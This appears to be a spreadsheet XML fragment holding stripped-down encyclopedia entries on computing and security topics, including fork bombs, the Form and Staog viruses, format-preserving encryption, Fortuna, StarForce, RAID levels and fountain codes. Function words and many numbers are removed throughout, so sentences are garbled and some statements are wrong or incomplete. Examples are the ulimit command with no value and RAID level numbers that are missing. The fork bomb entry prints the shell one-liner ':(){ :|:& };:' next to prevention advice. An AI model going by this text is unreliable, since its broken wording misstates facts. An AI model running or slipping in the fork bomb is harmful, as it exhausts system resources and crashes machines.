    <t>computing, fork bomb (also called rabbit virus wabbit) denial-of-service attack wherein process continually replicates deplete available system resources, slowing crashing system resource starvation. history around 1978, early variant fork bomb called wabbit reported system/360. descended similar attack called rabbits reported 1969 burroughs 5500 university washington. implementation fork bombs operate consuming time process forking, saturating operating system's process table. basic implementation fork bomb infinite loop repeatedly launches copies itself. unix-like operating systems, fork bombs generally written fork system call. forked processes also copies first program, resume execution next address frame pointer, continue forking endlessly within copy infinite loop; effect causing exponential growth processes. modern unix systems generally copy-on-write resource management technique forking processes, fork bomb generally saturate system's memory. microsoft windows operating systems equivalent functionality unix fork system call; fork bomb operating system must therefore create process instead forking existing one. classic example fork bomb unix shell :(){ :|:&amp; };:, easily understood function defined (fork()) calling (fork), piping result background (&amp;). prevention fork bomb's mode operation entirely encapsulated creating processes, preventing fork bomb severely affecting entire system limit maximum number processes single user own. linux, achieved using ulimit utility; example, command ulimit would limit affected user maximum thirty owned processes. pam-enabled systems, limit also /etc/security/limits.conf, freebsd, system administrator limits /etc/login.conf. modern linux systems also allow finer-grained fork bomb prevention cgroups process number (pid) controllers. also deadlock logic bomb time bomb (software) references external links examples fork bombs many languages</t>
  </si>
  <si>
    <t>Form (computer virus)</t>
  </si>
  <si>
    <t>form boot sector virus isolated switzerland summer 1990 became common worldwide. origin form widely listed switzerland, assumption based isolation locale. notable characteristics form infects boot sector instead master boot record (mbr) clicking noises associated infections. infections form result severe data damage operating system characteristics identical form assumes. notable arguably common virus world period early 1990s. infection form infects boot sector. when computer booted infected sector, form goes resident, hooks interrupt vector table, runs original boot sector hidden area flags defective. subsequently infect media inserted machine. symptoms form range symptoms, evident infections. form's famous side effect clicking noise produced typing keyboard 18th every month. however, payload rarely appears modern computers, execute keyboard driver installed. form consumes memory, command report memory unavailable. this appears infections. floppy disks, sectors) reported. this appears infections. form data sector contains text "the form-virus sends greetings everyone who's reading text. form destroy data! don't panic! fuckings corinne." additionally, versions form text removed. form makes assumption active partition partition. true, windows form overwrite result irreversible data loss. prevalence form listed spreading wildlist first ever version wildlist july 1993 january 2006.as boot viruses, form infection rare find modern times. since advent windows, boot viruses become increasingly uncommon, including form. generally, form infections floppy disks infected original pandemic since taken storage. variants form number variants. widely documented versions follows. form.a common variant original, clicking payload occurs every day, opposed 18th. form.b minor variant original, clicking payload 24th month instead 18th. rare find field 1990s, since become extinct wild. form.c virtually undocumented, trivial variant original. suggested form.c another minor variant form, activates may. like form.b, documented discovered rarely wild mid-1990s. form.d common version form besides original. some reports indicate affects partition table way. somewhat common virus 1997 1998. formii undocumented variant. form-canada undocumented variant. also stoned (computer virus) references external links f-secure ciac sophos mcafee</t>
  </si>
  <si>
    <t>Format-preserving encryption</t>
  </si>
  <si>
    <t>cryptography, format-preserving encryption (fpe), refers encrypting output (the ciphertext) format input (the plaintext). meaning "format" varies. typically finite sets characters used; numeric, alphabetic alphanumeric. example: encrypting 16-digit credit card number ciphertext another 16-digit number. encrypting english word ciphertext another english word. encrypting n-bit number ciphertext another n-bit number (this definition n-bit block cipher).for finite domains, purposes discussion below, cipher equivalent permutation integers n−1} size domain. motivation restricted field lengths formats motivation using comes problems associated integrating encryption existing applications, well-defined data models. typical example would credit card number, 1234567812345670 bytes long, digits only). adding encryption applications might challenging data models changed, usually involves changing field length limits data types. example, output typical block cipher would turn credit card number hexadecimal (e.g.0x96a45cbcf9c2a9425cde9e274948cb67, bytes, hexadecimal digits) base64 value (e.g. lqrcvpncqujc3p4nsujlzw==, bytes, alphanumeric special characters), break existing applications expecting credit card number 16-digit number. apart simple formatting problems, using aes-128-cbc, credit card number might encrypted hexadecimal value 0xde015724b081ea7003de4593d792fd8b695b39e095c98f3a220ff43522a2df02. addition problems caused creating invalid characters increasing size data, data encrypted using mode encryption algorithm also changes value decrypted encrypted again. this happens random seed value used initialize encryption algorithm included part encrypted value different encryption operation. because this, impossible data encrypted mode unique identify database. attempts simplify transition process preserving formatting length original data, allowing drop-in replacement plaintext values ciphertexts legacy applications. comparison truly random permutations although truly random permutation ideal cipher, large domains infeasible pre-generate remember truly random permutation. problem generate pseudorandom permutation secret key, computation time single value small (ideally constant, importantly smaller o(n)). comparison block ciphers n-bit block cipher technically ..., 2n-1}. needed standard sized sets (for example, aes) block cipher right size used. however, typical usage, block cipher used mode operation allows encrypt arbitrarily long messages, initialization vector discussed above. mode, block cipher fpe. definition security cryptographic literature (see references below), measure "good" whether attacker distinguish truly random permutation. various types attackers postulated, depending whether access oracles known ciphertext/plaintext pairs. algorithms approaches listed here, well-understood block cipher (such aes) used primitive take place ideal random function. this advantage incorporation secret algorithm easy. where mentioned following discussion, good block cipher would work well. constructions black rogaway implementing security provably related underlying block cipher first undertaken paper cryptographers john black phillip rogaway, described three ways this. they proved techniques secure block cipher used construct this means algorithm used create algorithm, resulting algorithm secure adversary capable defeating algorithm also defeat algorithm. therefore, secure, algorithms constructed also secure. following, denotes encryption operation used construct algorithm denotes encryption operation. prefix cipher simple create algorithm ..., n-1} assign pseudorandom weight integer, sort weight. weights defined applying existing block cipher integer. black rogaway call technique "prefix cipher" showed probably good block cipher used. thus, create domain {0,1,2,3}, given apply aes(k) integer, giving, example, weight(0) 0x56c644080098fc5570f2b329323dbf62 weight(1) 0x08ee98c0d05e3dad3eb3d6236f23e7b7 weight(2) 0x47d2e1bf72264fa01fb274465e56ba20 weight(3) 0x077de40941c93774857961a8a772650d sorting [0,1,2,3] weight gives [3,1,2,0], cipher f(0) f(1) f(2) f(3) this method useful small values larger values, size lookup table required number encryptions initialize table gets practical. cycle walking allowed values within domain pseudorandom permutation (for example block cipher like aes), algorithm created block cipher repeatedly applying block cipher result allowed values (within cyclewalkingfpe(x) p(x) element return p(x) else return cyclewalkingfpe(p(x)) recursion guaranteed terminate. (because one-to-one domain finite, repeated application forms cycle, starting point cycle eventually terminate this advantage elements mapped consecutive sequence {0,...,n-1} integers. disadvantage, much smaller domain, many iterations might required operation. block cipher fixed size, aes, severe restriction sizes method efficient. example, application want encrypt 100-bit values creates another 100-bit value. with technique, aes-128-ecb encryption applied reaches value highest bits take average iterations happen. feistel network also possible make algorithm using feistel network. feistel network needs source pseudo-random values sub-keys round, output algorithm used pseudo-random values. when done, resulting feistel construction good enough rounds used.one implement algorithm using feistel network many bits output needed equal length left right halves feistel network. 24-bit value needed sub-key, example, possible lowest bits output value. this result output feistel network preserving format input, possible iterate feistel network cycle-walking technique ensure format preserved. because possible adjust size inputs feistel network, possible make likely iteration ends quickly average. case credit card numbers, example, 1015 possible 16-digit credit card numbers (accounting redundant check digit), 1015 249.8, using 50-bit wide feistel network along cycle walking create algorithm encrypts fairly quickly average. thorp shuffle thorp shuffle like idealized card-shuffle, equivalently maximally-unbalanced feistel cipher side single bit. easier prove security unbalanced feistel ciphers balanced ones. mode domain sizes power two, existing block cipher smaller block size, cipher created using mode described bellare, rogaway. hasty pudding cipher hasty pudding cipher uses custom constructions (not depending existing block ciphers primitives) encrypt arbitrary finite small domains. ffsem/ffx mode ffsem mode (specification) accepted consideration nist uses feistel network construction black rogaway described above, round function, slight modification: single used tweaked slightly round. february 2010, ffsem superseded mode written mihir bellare, phillip rogaway, terence spies. (specification, nist block cipher modes development, 2010). jpeg 2000 encryption jpeg 2000 standard, marker codes range 0xff90 0xffff) appear plaintext ciphertext. simple modular-0xff90 technique cannot applied solve jpeg 2000 encryption problem. example, ciphertext words 0x23ff 0x9832 valid, combination 0x23ff9832 becomes invalid since introduces marker code 0xff98. similarly, simple cycle-walking technique cannot applied solve jpeg2000 encryption problem since valid ciphertext blocks give invalid ciphertext combined. example, first ciphertext block ends bytes "...30ff" second ciphertext block starts bytes "9832...", marker code "0xff98" would appear ciphertext. mechanisms format-preserving encryption jpeg 2000 given paper "efficient secure encryption schemes jpeg2000" hongjun perform format-preserving encryption jpeg 2000, technique exclude byte "0xff" encryption decryption. then jpeg 2000 encryption mechanism performs modulo-n addition stream cipher; another jpeg 2000 encryption mechanism performs cycle-walking technique block cipher. other constructions several constructs based adding output standard cipher, modulo data encrypted, various methods unbiasing result. modulo-n addition shared many constructs immediately obvious solution problem (thus number cases), main differences unbiasing mechanisms used. section fips federal information processing standards publication 1981 guidelines implementing using data encryption standard, describes encryption algorithm manner preserves format data modulo-n addition followed unbiasing operation. this standard withdrawn 2005, technique considered obsolete terms formal standard. another early mechanism format-preserving encryption peter gutmann's "encrypting data restricted range values" performs modulo-n addition cipher adjustments make result uniform, resulting encryption strong underlying encryption algorithm based. paper "using datatype-preserving encryption enhance data warehouse security" michael brightwell harry smith describes encryption algorithm preserves format plaintext. this technique appear apply unbiasing step modulo-n techniques referenced here. paper "format-preserving encryption" mihir bellare thomas ristenpart describes using "nearly balanced" feistel networks create secure algorithms. paper "format controlling encryption using datatype preserving encryption" mattsson describes ways create algorithms. example algorithm (flexible naor reingold). acceptance algorithms standards authorities nist special publication 800-38g, "recommendation block cipher modes operation: methods format-preserving encryption" specifies methods: ff3. details proposals submitted found nist block cipher modes development site, including patent test vector information. sample values available ff3. ffx[radix] "format-preserving feistel-based encryption mode" also standards processes ansi x9.119 x9.124. submitted nist mihir bellare university california, diego, phillip rogaway university california, davis, terence spies voltage security inc. test vectors supplied parts patented. (draft 800-38g requires minimum domain size data encrypted million (previously 100).ff3 named authors. submitted nist eric brier, thomas peyrin jacques stern ingenico, france. authors declared nist algorithm patented. cyberres voltage product, although claims patents also mode. april 2017, nist concluded longer suitable general-purpose method" researchers found vulnerability. ff3-1 (draft 800-38g replaces requires minimum domain size data encrypted million (previously 100).another mode included draft nist guidance removed final publication. vaes3 scheme ffx: addendum "the mode operation preserving encryption": parameter collection encipher strings arbitrary radix subkey operation lengthen life enciphering key. submitted nist joachim vance verifone systems inc. test vectors supplied separately parts patented. authors submitted modified algorithm active consideration nist.korea also developed standard, fea-1 fea-2. implementations open source implementations publicly available language, language, java, node.js, python, c#/.net rust references</t>
  </si>
  <si>
    <t>Format-transforming encryption</t>
  </si>
  <si>
    <t>cryptography, format-transforming encryption (fte) refers encryption format input plaintext output ciphertext configurable. descriptions formats vary, typically compact descriptors, regular expression.format-transforming encryption closely related generalization format-preserving encryption. applications restricted fields formats similar format-preserving encryption, used control format ciphertexts. canonical example credit card number, 1234567812345670 bytes long, digits only). however, enforce input format must output format. censorship circumvention used project circumvent deep packet inspection pretending protocols. implementation fteproxy; written authors came concept. references</t>
  </si>
  <si>
    <t>Fortezza</t>
  </si>
  <si>
    <t>fortezza information security system uses fortezza crypto card, card-based security token. developed u.s. government's clipper chip project used u.s. government various applications. each individual authorized protected information issued fortezza card stores private keys data needed gain access. contains approved security microprocessor called capstone (myk-80) implements skipjack encryption algorithm. original fortezza card (kov-8) type product means cannot used classified information. widely used type encryption card kov-12 fortezza card used extensively defense message system (dms). kov-12 cleared secret/sci. later version, called kov-14 fortezza plus, uses krypton microprocessor implements stronger, type encryption used information classified secret/sci. turn, replaced newer ksv-21 card modern algorithms additional capabilities. cards interchangeable within many types equipment support fortezza rekeyed reprogrammed owners, making easy issue reuse. this simplifies process rekeying equipment crypto changes: instead requiring expensive fill device, technician able fortezza card device's pcmcia slot. fortezza plus card successors used nsa's secure terminal equipment voice data encryption systems replacing stu-iii. manufactured mykotronx corporation spyrus. each card costs $240 commonly used card readers sold litronic corporation. fortezza card used government, military, banking applications protect sensitive data. references "fortezza crypto card". jane's military communications. jane's information group. 2009. retrieved february 2012. workstation security products division january 1997). "basic certification requirements fortezza™ applications". national security agency. retrieved february 2012. "nsa provides value-added crypto security". "fortezza crypto card". crypto museum. retrieved february 2012. kenneth herbert lin, (1996). "the capstone/fortezza initiative". cryptography's role securing information society. national research council. washington, national academy press. 176–177. isbn 978-0-309-05475-1. retrieved february 2012. peter gutmann (2004). "the capstone/fortezza generator". cryptographic security architecture: design verification. york: springer. 236–237. isbn 978-0-387-95387-8. retrieved february 2012. external links safenet site (mykotronx division safenet) spyrus site litronic site</t>
  </si>
  <si>
    <t>Fortuna (PRNG)</t>
  </si>
  <si>
    <t>fortuna cryptographically secure pseudorandom number generator (prng) devised bruce schneier niels ferguson published 2003. named fortuna, roman goddess chance. freebsd uses fortuna /dev/random /dev/urandom symbolically linked since freebsd apple oses switched fortuna since 2020 design fortuna family secure prngs; design leaves choices open implementors. composed following pieces: generator itself, seeded produce indefinite quantity pseudo-random data. entropy accumulator, collects genuinely random data various sources uses reseed generator enough randomness arrived. seed file, stores enough state enable computer start generating random numbers soon booted. generator generator based good block cipher. practical cryptography suggests aes, serpent twofish. basic idea cipher counter mode, encrypting successive values incrementing counter. with 128-bit block cipher, would produce statistically identifiable deviations randomness; instance, generating genuinely random 128-bit blocks would produce average pair identical blocks, repeated blocks among first 2128 produced 128-bit cipher counter mode. therefore, changed periodically: data (216 128-bit blocks) generated without change. book points block ciphers 256-bit greater) block size, enjoy much popularity time, statistical problem. also changed every data request (however small), future compromise endanger previous generator outputs. this property sometimes described "fast erasure" forward secrecy. entropy accumulator entropy accumulator designed resistant "injection" attacks, without needing sophisticated (and inevitably unreliable) estimators entropy. there several "pools" entropy; entropy source distributes alleged entropy evenly pools; (here idea) reseeding generator, pool used multiple thus, pool used 1/2k time. higher-numbered pools, words, contribute reseedings less frequently collect larger amount entropy reseedings. reseeding performed hashing specified entropy pools block cipher's using iterations sha-256. seeding unless attacker able control sources alleged entropy flowing system case algorithm save compromise), pool collects enough entropy reseedings reseeding pool ensures security. pool used interval proportional amount entropy question. therefore, system always recover injection attack, time takes constant factor greater theoretical time could take able identify sources entropy corrupt not. this conclusion depends enough pools. fortuna uses pools, restricts reseeding happen times second. running pools would take years, ferguson schneier deem long enough practical purposes. more paranoid implementors, ones requiring generation random data colossal rate correspondingly frequent reseeding, could larger number pools. alternatives fortuna differs earlier yarrow algorithm family schneier, kelsey ferguson mostly handling entropy accumulator. yarrow required source entropy accompanied mechanism estimating actual entropy supplied, used pools; suggested embodiment (called yarrow-160) used sha-1 rather iterated sha-256. analysis analysis proposed improvement fortuna made 2014. also blum blum shub cryptgenrandom random number generator attack yarrow algorithm references general niels ferguson bruce schneier, practical cryptography, published wiley 2003. isbn 0-471-22357-3. john viega, "practical random number generation software," acsac, 129, 19th annual computer security applications conference (acsac '03), 2003 external links "fortuna bruce schneier's website".ferguson, niels; schneier, bruce; kohno, tadayoshi (2010). "chapter generating randomness" (pdf). cryptography engineering: design principles practical applications. wiley publishing, inc. isbn 978-0-470-47424-2."javascript crypto library". includes javascript implementation fortuna prng.cooke, jean-luc (2005). "jlcooke's explanation improvements /dev/random". patch adding implementation fortuna linux kernel.litzenberger, dwayne (2013-10-20). "fortuna implementation python, part python cryptography toolkit"."how your entropy have optimal recovery strategies compromised rngs". 2014-03-14."fortuna implementation c++14". includes example server, entropy sources command-line client. 2015-06-01.</t>
  </si>
  <si>
    <t>StarForce</t>
  </si>
  <si>
    <t>starforce technologies russian software developer headquarters moscow. main activities: information security, protection unauthorized copying, modification analysis (decompilation). protection options starforce technologies provides multiple protection options protecting digital information, anti-cheat solutions, obfuscation, generation cryptographic obfuscation, optical disc drm, limited activation number machine/optical disk drive, audio video files, protection digital media images documents. relevant protection brands are: audio/video, obfuscator, crypto, content, disc, e-m@il, mmog, proactive (additional versions businesses traders) universal. security when starforce released, initially provided extremely strong protection starforce 3.0-protected game splinter cell: chaos theory uncracked days. also marked significant step effort required reverse engineer it.in march 2006 warez group reloaded released vast array documentation starforce works. alongside many technical details, revealed several resource-intensive procedures implemented, virtual file system functions protected within complex virtual machine. driver installation starforce received criticism installing device driver onto computers along protected product, generally uninstalled along software (peter jackson's king kong exception). colin mcrae: dirt, however, asks player permission install drivers includes help file information remove them. lite starforce drivers installed certain older game demos, freeware downloadable games, like trackmania nations. their presence intended prevent crackers using demo executables help break retail executables usually quite similar). driverless currently (may 2014) starforce solutions became much easier users "driverless" security technology binding computer. company also developing cloud services protect content e-mail designed simplify process information protection used everyday life. clients starforce's customers include russian railways, corel, mail.ru, aeroflot, inbev russia, amd, international, mediahouse, russobit-m, disc, buka, snowball, 2play, gfi, cenega akella. community response some gamers advocated boycotts games publishers known starforce. these gamers claim starforce software causes system instability crashes, protection technology refuses address damage software causes. 2006, million lawsuit filed ubisoft using starforce games allegations starforce compromises security, slows pcs, causes crashes even damages optical drives. however, case dropped years later lack evidence.ubisoft decided investigate extent starforce boycott poll forums, outcome starforce. result, (along general discontent web), heroes might magic gtr2, starforce replaced securom. removal starforce drivers uninstalling starforce-protected game remove starforce driver system. starforce provides functions implementors remove driver uninstall game, automatically carried out. official utility program exists remove starforce driver system. program hosted third-party website link official starforce website. instructions manual removal also provided community.starting starforce includes removal service. this service automatically uninstalls starforce drivers starforce protected product uninstalled. after drivers uninstalled, service uninstalls well. controversy january 2006, boing boing claimed starforce malware, mentioning several problems claimed associated protection system, including disk drive performance degradation weakening operating system security stability. tweakguides subsequently countered boing boing's claim, stating evidence starforce anything harmful.on march 2006, starforce employee publicly posted working link bittorrent search engine listing galactic civilizations torrents discussion popularity game. their action publicized various websites, including digg, neowin, penny arcade. stardock also posted article, partially response inaccurate reporting reasons releasing game without copy protection. starforce later closed thread, posting apology stating employee "just wanted show every non-protected game cracked". also securom safedisc cd-cops extended copy protection ("xcp") references external links official site starforce drivers removal tool location tweakguide's analysis starforce controversy</t>
  </si>
  <si>
    <t>Staog</t>
  </si>
  <si>
    <t>staog first computer virus written linux operating system. discovered autumn 1996, vulnerabilities exploited fixed soon after. detected wild since initial outbreak.staog able infect linux despite security-oriented design requires users programs root drastic operations taken. worked exploiting kernel vulnerabilities stay resident. then, would infect executed binaries.since relied fundamental bugs, software upgrades made systems immune staog. this, combined shot dark method transmitting itself, ensured died rather quickly.staog written assembly language hacker group vlad. also linux malware references external links staog information f-secures website staog virus: linux-kernel archive</t>
  </si>
  <si>
    <t>Standard RAID levels</t>
  </si>
  <si>
    <t>computer storage, standard raid levels comprise basic raid ("redundant array independent disks" "redundant array inexpensive disks") configurations employ techniques striping, mirroring, parity create large reliable data stores multiple general-purpose computer hard disk drives (hdds). common types raid (striping), raid (mirroring) variants, raid (distributed parity), raid (dual parity). multiple raid levels also combined nested, instance raid (striping mirrors) raid (mirroring stripe sets). raid levels associated data formats standardized storage networking industry association (snia) common raid disk drive format (ddf) standard. numerical values serve identifiers signify performance, reliability, generation, metric. while raid levels provide good protection recovery hardware defects defective sectors/read errors (hard errors), provide protection data loss catastrophic failures (fire, water) soft errors user error, software malfunction, malware infection. valuable data, raid building block larger data loss prevention recovery scheme cannot replace backup plan. raid raid (also known stripe striped volume) splits ("stripes") data evenly across disks, without parity information, redundancy, fault tolerance. since raid provides fault tolerance redundancy, failure drive cause entire array fail; result data striped across disks, failure result total data loss. this configuration typically implemented speed intended goal. raid normally used increase performance, although also used create large logical volume physical disks.a raid setup created disks differing sizes, storage space added array disk limited size smallest disk. example, disk striped together disk, size array however, raid implementations allow remaining used purposes. diagram section shows data distributed stripes disks, a1:a2 first stripe, a3:a4 second one, etc. once stripe size defined creation raid array, needs maintained times. since stripes accessed parallel, n-drive raid array appears single large disk data rate times higher single-disk rate. performance raid array drives provides data read write transfer rates times high individual drive rates, data redundancy. result, raid primarily used applications require high performance able tolerate lower reliability, scientific computing computer gaming.some benchmarks desktop applications show raid performance marginally better single drive. another article examined claims concluded "striping always increase performance certain situations actually slower non-raid setup), situations yield significant improvement performance". synthetic benchmarks show different levels performance improvements multiple hdds ssds used raid setup, compared single-drive performance. however, synthetic benchmarks also show drop performance comparison. raid raid consists exact copy mirror) data disks; classic raid mirrored pair contains disks. this configuration offers parity, striping, spanning disk space across multiple disks, since data mirrored disks belonging array, array smallest member disk. this layout useful read performance reliability important write performance resulting data storage capacity.the array continue operate long least member drive operational. performance read request serviced handled drive array; thus, depending nature load, random read performance raid array equal member's performance, write performance remains level single disk. however, disks different speeds used raid array, overall write performance equal speed slowest disk.synthetic benchmarks show varying levels performance improvements multiple hdds ssds used raid setup, compared single-drive performance. however, synthetic benchmarks also show drop performance comparison. raid raid rarely used practice, stripes data (rather block) level, uses hamming code error correction. disks synchronized controller spin angular orientation (they reach index time), generally cannot service multiple requests simultaneously. however, depending high rate hamming code, many spindles would operate parallel simultaneously transfer data "very high data transfer rates" possible example datavault data bits transmitted simultaneously. with hard disk drives implementing internal error correction, complexity external hamming code offered little advantage parity raid rarely implemented; original level raid currently used. raid raid rarely used practice, consists byte-level striping dedicated parity disk. characteristics raid generally cannot service multiple requests simultaneously, happens single block data will, definition, spread across members reside physical location disk. therefore, operation requires activity every disk usually requires synchronized spindles. this makes suitable applications demand highest transfer rates long sequential reads writes, example uncompressed video editing. applications make small reads writes random disk locations worst performance level.the requirement disks spin synchronously lockstep) added design considerations provided significant advantages raid levels. both raid raid quickly replaced raid raid usually implemented hardware, performance issues addressed using large disk caches. raid raid consists block-level striping dedicated parity disk. result layout, raid provides good performance random reads, performance random writes need write parity data single disk, unless filesystem raid-4-aware compensates that. advantage raid quickly extended online, without parity recomputation, long newly added disks completely filled 0-bytes. diagram read request block would serviced disk simultaneous read request block would wait, read request could serviced concurrently disk raid raid consists block-level striping distributed parity. unlike raid parity information distributed among drives. requires drives present operate. upon failure single drive, subsequent reads calculated distributed parity data lost. raid requires least three disks.there many layouts data parity raid disk drive array depending upon sequence writing across disks, sequence data blocks written, left right right left disk array, disks location parity block beginning stripe, location first block stripe respect parity previous stripe.the figure right shows data blocks written left right, parity block stripe first block next stripe disk parity block previous stripe. designated left asynchronous raid layout layout identified last edition raid book published defunct raid advisory board. synchronous layout data first block next stripe written drive parity block previous stripe. comparison raid raid distributed parity evens stress dedicated parity disk among raid members. additionally, write performance increased since raid members participate serving write requests. although efficient striping (raid setup, parity must still written, longer bottleneck.since parity calculation performed full stripe, small changes array experience write amplification: worst case single, logical sector written, original sector according parity sector need read, original data removed parity, data calculated parity data sector parity sector written. raid raid extends raid adding another parity block; thus, uses block-level striping parity blocks distributed across member disks.as raid many layouts raid disk arrays depending upon direction data blocks written, location parity blocks respect data blocks whether first data block subsequent stripe written drive last parity block prior stripe. figure right many layouts. according storage networking industry association (snia), definition raid "any form raid continue execute read write requests raid array's virtual disks presence concurrent disk failures. several methods, including dual check data computations (parity reed–solomon), orthogonal dual parity check data diagonal parity, used implement raid level performance raid performance penalty read operations, performance penalty write operations overhead associated parity calculations. performance varies greatly depending raid implemented manufacturer's storage architecture—in software, firmware, using firmware specialized asics intensive parity calculations. raid read speed raid number physical drives.when either diagonal orthogonal dual parity used, second parity calculation necessary write operations. this doubles overhead raid-6 writes, versus single-parity raid levels. when reed solomon code used, second parity calculation unnecessary. reed solomon advantage allowing redundancy information contained within given stripe. simplified parity example suppose would like distribute data {\displaystyle chunks. goal define parity values {\displaystyle \mathbf {\displaystyle \mathbf known syndromes, resulting system {\displaystyle n+2} physical drives resilient loss them. order generate single independent syndrome, need perform parity calculations data chunks size {\displaystyle k&gt;1.} typical choice practice chunk size {\displaystyle k=8} i.e. striping data per-byte. denote base-2 representation data chunk {\displaystyle {\displaystyle d_{0}d_{1}...d_{k-1}} {\displaystyle d_{i}} either using small number chunks {\displaystyle n\leq simple parity computation, help motivate reed–solomon system general case. first parity value {\displaystyle \mathbf compute simple data across stripes, raid this written {\displaystyle \oplus denotes operator. second parity value analogous, data chunk bit-shifted different amount. writing {\displaystyle \mathrm {shift} (d)=d_{1}...d_{k-1}d_{0}} define event single drive failure, data recomputed {\displaystyle \mathbf like raid show also recover simultaneous failure drives. lose data chunk {\displaystyle \mathbf recover {\displaystyle \mathbf remaining data using fact {\displaystyle d\oplus d=0} suppose system {\displaystyle n=4} chunks, drive containing chunk {\displaystyle d_{3}} failed. compute recover lost data {\displaystyle d_{3}} undoing shift. also recover failure data disks computing {\displaystyle \mathbf {\displaystyle \mathbf remaining data. previous example, chunk {\displaystyle d_{0}} lost well, would computeon bitwise level, represents system {\displaystyle equations {\displaystyle unknowns uniquely determine lost data. this system longer work applied larger number drives {\displaystyle n&gt;k} this repeatedly apply shift operator {\displaystyle times chunk length {\displaystyle back started. tried apply algorithm system containing {\displaystyle data disks, right-hand side second equation would {\displaystyle d_{0}\oplus \mathrm {shift} ^{k}(d_{k})=d_{0}\oplus d_{k}} first equations. this would yield half many equations needed solve missing values. general parity system possible support greater number drives choosing parity function carefully. issue face ensure system equations finite field {\displaystyle \mathbb _{2}} unique solution, turn theory polynomial equations. consider galois field {\displaystyle gf(m)} {\displaystyle m=2^{k}} this field isomorphic polynomial field {\displaystyle f_{2}[x]/(p(x))} suitable irreducible polynomial {\displaystyle p(x)} degree {\displaystyle {\displaystyle \mathbb _{2}} represent data elements {\displaystyle polynomials {\displaystyle \mathbf =d_{k-1}x^{k-1}+d_{k-2}x^{k-2}+...+d_{1}x+d_{0}} galois field. {\displaystyle \mathbf _{0},...,\mathbf _{n-1}\in gf(m)} correspond stripes data across hard drives encoded field elements manner. {\displaystyle \oplus denote addition field, concatenation denote multiplication. reuse {\displaystyle \oplus intentional: addition finite field {\displaystyle \mathbb _{2}} represents operator, computing elements equivalent computing polynomial coefficients. generator field element field {\displaystyle g^{i}} different non-negative {\displaystyle i&lt;m-1} this means element field, except value {\displaystyle written power {\displaystyle finite field guaranteed least generator. pick generator {\displaystyle define {\displaystyle \mathbf {\displaystyle \mathbf follows: before, first checksum {\displaystyle \mathbf stripe, though interpreted polynomial. effect {\displaystyle g^{i}} thought action carefully chosen linear feedback shift register data chunk. unlike shift simplified example, could applied {\displaystyle times encoding began repeat, applying operator {\displaystyle multiple times guaranteed produce {\displaystyle m=2^{k}-1} unique invertible functions, allow chunk length {\displaystyle support {\displaystyle 2^{k}-1} data pieces. data chunk lost, situation similar before. case lost data chunks, compute recovery formulas algebraically. suppose {\displaystyle \mathbf _{i}} {\displaystyle \mathbf _{j}} lost values {\displaystyle i\neq then, using values {\displaystyle find constants {\displaystyle {\displaystyle solve {\displaystyle d_{i}} second equation plug first find {\displaystyle d_{j}=(g^{m-i+j}\oplus 1)^{-1}(g^{m-i}b\oplus {\displaystyle d_{i}=a\oplus d_{j}} unlike computation relatively intensive, involves polynomial multiplication {\displaystyle f_{2}[x]/(p(x))} this mitigated hardware implementation using fpga. comparison following table provides overview considerations standard raid levels. case, array space efficiency given expression terms number drives, expression designates fractional value zero one, representing fraction drives' capacities available use. example, three drives arranged raid gives array space efficiency 67%; thus, drive example capacity array total capacity capacity usable data storage different raid configurations also detect failure called data scrubbing. historically disks subject lower reliability raid levels also used detect disk array failed addition disk failed. though noted patterson even inception raid many (though all) disks already capable finding internal errors using error correcting codes. particular is/was sufficient mirrored disks detect failure, disks sufficient detect failed disk array without error correcting features. modern raid arrays depend part disk's ability identify faulty detected part scrub. redundant information used reconstruct missing data, rather identify faulted drive. drives considered faulted experience unrecoverable read error, occurs drive retried many times read data failed. enterprise drives also report failure fewer tries consumer drives part tler ensure read request fulfilled timely manner. system implications measurement performance five filesystems five storage configurations—single ssd, raid raid raid raid shown f2fs raid raid eight ssds outperforms ext4 times times, respectively. measurements also suggest raid controller significant bottleneck building raid system high speed ssds. nested raid combinations standard raid levels. they also known raid raid raid raid raid raid raid raid raid raid raid 10+0 raid 100. non-standard variants addition standard nested raid levels, alternatives include non-standard raid levels, non-raid drive architectures. non-raid drive architectures referred similar terms acronyms, notably jbod ("just bunch disks"), span/big, maid ("massive array idle disks"). notes references further reading "learning about raid". support.dell.com. dell. 2009. archived original 2009-02-20. retrieved 2016-04-15. redundant arrays inexpensive disks (raids), chapter operating systems: three easy pieces book remzi arpaci-dusseau andrea arpaci-dusseau external links summary raid levels raid parity explanation checking tool raid calculator standard raid levels other raid tools storedge 3000 family configuration service user’s guide: raid basics</t>
  </si>
  <si>
    <t>GTunnel</t>
  </si>
  <si>
    <t>gtunnel windows application developed garden networks sets local http socks proxy server tunnels traffic server farm reaches intended destination. features gtunnel protects internet users' privacy freedom speech ways: user's address hidden user's internet privacy protected. destination servers gtunnel server addresses instead. traffic content encrypted industry-strength algorithms user's gtunnel servers local filtering/censorship systems content clear-text format.gtunnel version provides standard mode, main working mode provides best data transfer performance connecting back-end servers directly, skype mode, mode computers network. gtunnel also improved user interface features real-time traffic graphs. gtunnel replaces earlier garden client software becomes main client software garden networks. gtunnel works linux wine support. diagram gtunnel's working modes also garden networks freegate ultrasurf references external links http://gardennetworks.org/download download latest version gtunnel techspot.com</t>
  </si>
  <si>
    <t>Fountain code</t>
  </si>
  <si>
    <t>coding theory, fountain codes (also known rateless erasure codes) class erasure codes property potentially limitless sequence encoding symbols generated given source symbols original source symbols ideally recovered subset encoding symbols size equal slightly larger number source symbols. term fountain rateless refers fact codes exhibit fixed code rate. fountain code optimal original source symbols recovered successfully received encoding symbols (i.e., excluding erased). fountain codes known efficient encoding decoding algorithms allow recovery original source symbols encoding symbols high probability, slightly larger codes first practical realization fountain codes. raptor codes online codes subsequently introduced, achieve linear time encoding decoding complexity pre-coding stage input symbols. applications fountain codes flexibly applicable fixed code rate, fixed code rate cannot determined priori, efficient encoding decoding large amounts data required. example data carousel, large file continuously broadcast receivers. using fixed-rate erasure code, receiver missing source symbol (due transmission error) faces coupon collector's problem: must successfully receive encoding symbol already have. this problem becomes much apparent using traditional short-length erasure code, file must split several blocks, separately encoded: receiver must collect required number missing encoding symbols block. using fountain code, suffices receiver retrieve subset encoding symbols size slightly larger source symbols. practice, broadcast typically scheduled fixed period time operator based characteristics network receivers desired delivery reliability, thus fountain code used code rate determined dynamically time file scheduled broadcast.) another application hybrid reliable multicast scenarios: parity information requested receiver potentially useful receivers multicast group. fountain codes standards raptor codes efficient fountain codes time, efficient linear time encoding decoding algorithms, requiring small constant number operations generated symbol encoding decoding. ietf 5053 specifies detail systematic raptor code, adopted multiple standards beyond ietf, within 3gpp mbms standard broadcast file delivery streaming services, dvb-h ipdc standard delivering services networks, 